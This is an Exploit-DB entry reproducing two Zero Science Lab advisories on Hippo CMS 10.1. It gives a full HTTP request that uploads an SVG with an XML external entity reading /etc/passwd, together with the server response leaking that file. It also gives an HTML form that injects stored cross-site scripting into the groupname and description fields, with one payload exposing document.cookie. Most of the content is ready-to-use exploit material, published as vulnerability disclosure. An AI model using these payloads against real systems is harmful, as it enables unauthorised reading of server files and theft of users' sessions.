Hippo CMS 10.1 – Multiple Vulnerabilities

• Exploit Database
• 11 阅读

• 作者： LiquidWorm
  日期： 2016-02-01
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/39391/

• 
  Hippo CMS 10.1 XML External Entity Information Disclosure Vulnerability
  
  
  Vendor: Hippo B.V.
  Product web page: http://www.onehippo.org
  Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition)
  
  Summary: Hippo CMS is an open source Java CMS. We built it so you
  can easily integrate it into your existing architecture.
  
  Desc: XXE (XML External Entity) processing through upload of SVG
  images in the CMS, and through XML import in the CMS Console application.
  
  Tested on: Linux 2.6.32-5-xen-amd64
   Java/1.8.0_66
   Apache-Coyote/1.1
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2016-5301
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5301.php
  
  Vendor: http://www.onehippo.org/security-issues-list/security-12.html
  http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html
  
  
  04.12.2015
  
  ---
  
  
  [Request]:
  
  
  POST /?1-8.IBehaviorListener.0-root-tabs-panel~container-cards-2-panel-center-tabs-panel~container-cards-3-panel-editor-extension.editor-form-template-view-3-item-view-1-item-extension.upload-fileUpload-form-fileUpload HTTP/1.1
  Host: 10.0.2.17
  User-Agent: ZSL_Web_Scanner/2.8
  Accept: application/json, text/javascript, */*; q=0.01
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  Referer: https://10.0.2.17/?1&path=/content/gallery/test4.svg
  Content-Length: 2101
  Content-Type: multipart/form-data; boundary=---------------------------20443294602274
  Cookie: [OMMITED]
  Connection: keep-alive
  Pragma: no-cache
  Cache-Control: no-cache
  
  
  -----------------------------20443294602274
  Content-Disposition: form-data; name="id1a0_hf_0"
  
  
  -----------------------------20443294602274
  Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:1:item
  :view:1:item:value:widget"
  
  
  -----------------------------20443294602274
  Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item
  :view:1:item:view:1:item:view:1:item:value:widget"
  
  
  -----------------------------20443294602274
  Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item
  :view:1:item:view:2:item:view:1:item:value:widget"
  
  
  -----------------------------20443294602274
  Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
  :view:1:item:view:1:item:value:widget"
  
  asd
  -----------------------------20443294602274
  Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
  :view:2:item:view:1:item:value:widget"
  
  hhh
  -----------------------------20443294602274
  Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
  :view:3:item:view:1:item:panel:editor"
  
  
  -----------------------------20443294602274
  Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right
  :view:2:item:view:1:item:value:widget"
  
  hhh
  -----------------------------20443294602274
  Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right
  :view:3:item:view:1:item:value:widget"
  
  hhhh
  -----------------------------20443294602274
  Content-Disposition: form-data; name="files[]"; filename="svgupload2.svg"
  Content-Type: image/svg+xml
  
  <?xml version="1.0" standalone="yes"?><!DOCTYPE zsl [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]
  ><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999
  /xlink" version="1.1">&xxe;</svg>
  -----------------------------20443294602274--
  
  
  
  [Response]:
  
  
  <?xml version="1.0" encoding="UTF-8"?><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www
  .w3.org/1999/xlink" height="7" version="1.1" viewBox="0 0 500.0 40.0" width="98">
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  bin:x:2:2:bin:/bin:/bin/sh
  sys:x:3:3:sys:/dev:/bin/sh
  sync:x:4:65534:sync:/bin:/bin/sync
  ***
  ***
  ***
  ***
  </svg>
  
  ###############################################################################
  
  <!--
  
  Hippo CMS 10.1 Stored Cross-Site Scripting Vulnerability
  
  
  Vendor: Hippo B.V.
  Product web page: http://www.onehippo.org
  Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition)
  
  Summary: Hippo CMS is an open source Java CMS. We
  built it so you can easily integrate it into your
  existing architecture.
  
  Desc: Hippo CMS suffers from a stored XSS vulnerability.
  Input passed thru the POST parameters 'groupname' and
  'description' is not sanitized allowing the attacker to
  execute HTML code into user's browser session on the
  affected site.
  
  
  Tested on: Linux 2.6.32-5-xen-amd64
   Java/1.8.0_66
   Apache-Coyote/1.1
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2016-5300
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5300.php
  
  Vendor: http://www.onehippo.org/security-issues-list/security-12.html
  http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html
  
  
  04.12.2015
  
  -->
  
  
  <html>
   <body>
  <form action="https://10.0.2.17/?1-1.IBehaviorListener.0-root-tabs-panel~container-cards-6-panel-panel-form-create~button" method="POST">
   <input type="hidden" name="id26c_hf_0" value="" />
   <input type="hidden" name="groupname" value="<img src=ko onerror=confirm(document.cookie)>" />
   <input type="hidden" name="description" value="<img src=ko onerror=confirm(2)>" />
   <input type="hidden" name="create-button" value="1" />
   <input type="submit" value="Inject code" />
  </form>
   </body>
  </html>